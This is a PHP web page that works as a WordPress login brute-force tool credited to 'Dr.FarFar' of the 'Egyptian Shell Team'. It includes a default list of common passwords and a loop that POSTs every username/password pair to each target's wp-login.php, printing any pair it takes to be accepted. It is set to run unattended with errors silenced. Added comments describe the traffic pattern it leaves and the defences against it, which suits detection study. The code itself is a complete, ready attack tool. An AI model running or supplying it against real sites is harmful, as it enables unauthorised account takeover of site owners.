- <?php /*
-  * Banner and runtime setup. The echo writes an HTML comment (tool name,
-  * author, licence text) into the response; the three calls after it
-  * configure the request for a long unattended run.
-  * Triage note: a PHP file on a web host that silences errors, lifts the
-  * time limit and keeps running after the client disconnects is set up for
-  * background work rather than for serving a page, and deserves a closer look.
-  */
- echo "
- <!--
- WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing
- Powered By Dr.FarFar
- PS: This Tool is For Penetration Testing And Educational Purpose, Dr.FarFar Is Not Responsible At Any Bad Using For This Tool.
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation, either version 3 of the License, or
- (at your option) any later version.
- -->
- ";
- error_reporting(0); // turn off all PHP error reporting
- set_time_limit(0); // no execution time limit
- ignore_user_abort(true); // keep running after the browser disconnects
- ?>
- <html>
- <head>
- <title> | </title>
- <HEAD>
- <SCRIPT LANGUAGE="JavaScript">
- <!-- Begin
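// Window-title ticker: shows each entry of `message` in document.title,
// framed by an eight-step bar pattern, then moves on to the next entry.

// Texts shown in the title, in order; append entries to add more.
var message = [
    "WordPress Admin Panel Brute Force Attacks",
    "Powered By Dr.FarFar",
    "Egyptian Shell Team Penetration Testing",
    "Egyptian Shell Team",
    "Powered By Dr.FarFar",
    "Egyptian Shell Team Penetration Testing",
    "Powered By Dr.FarFar"
];

var reps = 2;     // how many times the eight-frame cycle repeats per message
var speed = 200;  // delay between frames in ms (larger number = slower)

// Internal state.
var p = message.length;  // number of messages
var T = "";              // message currently shown
var C = 0;               // frames scheduled so far for the current message
var mC = 0;              // index of the current message
var s = 0;               // current frame, 1..8
var sT = null;           // handle of the pending timer, null when none
if (reps < 1) reps = 1;

// Load the current message and draw its first frame.
function doTheThing() {
    T = message[mC];
    A();
}

// Draw the next frame; after 8 * reps scheduled frames, advance to the next
// message (wrapping to the first) and start over.
function A() {
    // [left, right] decoration for frames 1..8; frames 6-8 mirror 4-2.
    var frames = [
        ['||||||====||[ ', ' ]||====||||||'],
        ['|||=|||===||[ ', ' ]||===|||=|||'],
        ['|||==|||==||[ ', ' ]||==|||==|||'],
        ['|||===|||=||[ ', ' ]||=|||===|||'],
        ['|||====|||||[ ', ' ]|||||====|||'],
        ['|||===|||=||[ ', ' ]||=|||===|||'],
        ['|||==|||==||[ ', ' ]||==|||==|||'],
        ['|||=|||===||[ ', ' ]||===|||=|||']
    ];

    s++;
    if (s > frames.length) { s = 1; }
    document.title = frames[s - 1][0] + T + frames[s - 1][1];

    if (C < (frames.length * reps)) {
        // Pass the function itself: a string argument to setTimeout is
        // evaluated like eval() and is refused under a strict
        // Content-Security-Policy.
        sT = setTimeout(A, speed);
        C++;
    }
    else {
        C = 0;
        s = 0;
        mC++;
        if (mC > p - 1) mC = 0;
        sT = null;
        doTheThing();
    }
}

doTheThing();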
- // End -->
- </script>
- <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
- <style type="text/css">
- body {
- color: white;
- background-image: url(http://i283.photobucket.com/albums/kk281/fjachel/Black-background.gif);
- }
- textarea {
- border-radius: 8px;
- color: white;
- background-color:black;
- }
- input[type=submit] , .submit{
- background-color:black;
- color:white;
- border-radius:8px;
- }
- p {
- font-size: 10px;
- text-align: center;
- }
- a:link,a:hover,a:visited {
- color:pink;
- }
- </style>
- </head>
- <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
- <center>
- <p><a href="http://9eg.blogspot.com" target="_blank"><img
- src="http://im37.gulfup.com/VLNdW.png"
- border="0"/></a></p>
- <form enctype="multipart/form-data" method="POST">
- <table width='624' border='0' id='Box'>
- <tr>
- <td width='4%'> </td>
- <p><span style="color:#FFFF00;"><span style="font-size:28px;"><strong>WordPress Admin Panel</strong> <strong style="margin: 0px; padding: 0px; border: 0px; font-style: inherit; line-height: inherit; font-family: inherit;">Brute Force Attacks</strong></span></span></p>
- <tr>
- <td > </td>
- <td ><b><p>Hosts:</p></b></td>
- <td ><b><p> Users:</p></b></td>
- <td ><b><p>Passwords:</p></b></td>
- </tr>
- <tr>
- <td> </td>
- <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
- <td ><textarea name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo
- "admin\nadministrator";} ?></textarea></td>
- <td ><textarea name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
- </tr>
- <tr><td colspan="4"><input type="submit" name="submit" value="[ Attack Now ]" />
- <?php /*
-  * Form handler. For every line of the submitted "hosts" field it requests
-  * /wp-login.php and, if that answers HTTP 200, POSTs each username/password
-  * pair to it. A response body that mentions "profile.php" is treated as an
-  * accepted login and ends the attempts for that host.
-  *
-  * What this looks like from the defending side, as far as the code shows:
-  *  - any scheme the operator typed is stripped, so requests go to http://;
-  *  - a run of POSTs to /wp-login.php from one client with changing log/pwd
-  *    values, a constant wp-submit=Giri? field, testcookie=1 and redirect_to
-  *    pointing at /wp-admin/;
-  *  - no pause between attempts, and no CURLOPT_USERAGENT is set;
-  *  - the machine running the script gets a cookie jar named coki.txt
-  *    (relative path) that every request reads and writes.
-  * Login throttling or lockout on wp-login.php, multi-factor authentication
-  * and passwords that are not on common lists are the controls that stop
-  * this kind of loop.
-  */
- if($_POST)
- {
- $hosts = trim(filter($_POST['hosts']));
- $passwords = trim(filter($_POST['passwords']));
- $usernames = trim(filter($_POST['usernames']));
- if($passwords && $usernames && $hosts)
- {
- $hosts_explode = explode("\n", $hosts);
- $usernames_explode = explode("\n", $usernames);
- $passwords_explode = explode("\n", $passwords);
- foreach($hosts_explode as $host)
- {
- $host = RemoveLastSlash($host);
- $hacked = 0; // per-host flag, set to 1 once a pair is accepted
- $host = str_replace(array("http://","https://","www."),"",trim($host)); // drop scheme and "www."
- $host = "http://".$host; // always plain HTTP
- $wpAdmin = $host.'/wp-admin/';
- if(!url_exists($host."/wp-login.php")) // probe: skip the host unless the login page answers 200
- {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush
- ();continue;}
- foreach($usernames_explode as $username)
- {
- foreach($passwords_explode as $password)
- {
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt"); // cookies are written to this file
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt"); // and read back from the same file
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".
- $password."&wp-submit=Giri?"."&redirect_to=".$wpAdmin."&testcookie=1");
- $login = curl_exec($ch);
- if(eregi ("profile.php",$login) ) // success heuristic: case-insensitive match on the response body
- {
- $hacked = 1;
- echo "<p>".$host." => UserName : [<font color='green'>".
- $username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
- ob_flush();flush();break;
- }
- }
- if($hacked == 1){break;} // stop trying further usernames for this host
- }
- if($hacked == 0)
- {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
- }
- }
- else {echo "<p><b><font color='red'>All fields are Required ! </font></b></p>";}
- }
- ?>
- </td></tr>
- </table></form>
- <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
- <p><strong>Powered By <a href="http://9eg.blogspot.com">Dr.FarFar</a></strong></p>
- </center>
- <p>
- <?php
- function url_exists($strURL)
- { /*
-  * Requests $strURL and returns true only when the HTTP status of the
-  * response is 200; any other status gives false. The form handler uses it
-  * to decide whether a host exposes wp-login.php before sending logins.
-  */
- $resURL = curl_init();
- curl_setopt($resURL, CURLOPT_URL, $strURL);
- curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
- curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); // callback is not defined in this listing; its behaviour is not visible here
- curl_setopt($resURL, CURLOPT_FAILONERROR, 1); // treat HTTP status >= 400 as a failed transfer
- curl_exec ($resURL);
- $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE); // status code of the last response
- curl_close ($resURL);
- if ($intReturnCode != 200){return false;}
- else{return true ;}
- }
- function filter($string)
- { /*
-  * Undoes magic-quotes escaping: when get_magic_quotes_gpc() reports a
-  * non-zero value, backslashes are stripped from $string; otherwise the
-  * value is returned unchanged. Nothing else is validated or escaped here.
-  */
- if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
- else{return $string; }
- }
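/**
 * Drop a single trailing "/" from $host, if there is one.
 *
 * Only the last character is examined, so "a//" becomes "a/" and a value
 * that does not end in a slash is returned unchanged.
 *
 * @param string $host
 * @return string
 */
function RemoveLastSlash($host)
{
    // Look at the final character directly. The previous strrpos()-based test
    // compared a possible `false` loosely with strlen() - 1, so a
    // one-character value without any slash was turned into "", and an empty
    // string reached strrpos() with an out-of-range offset.
    if ($host !== '' && substr($host, -1) === '/') {
        return substr($host, 0, strlen($host) - 1);
    }

    return $host;
}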
- ?>
- <?php echo "</p>"; ?>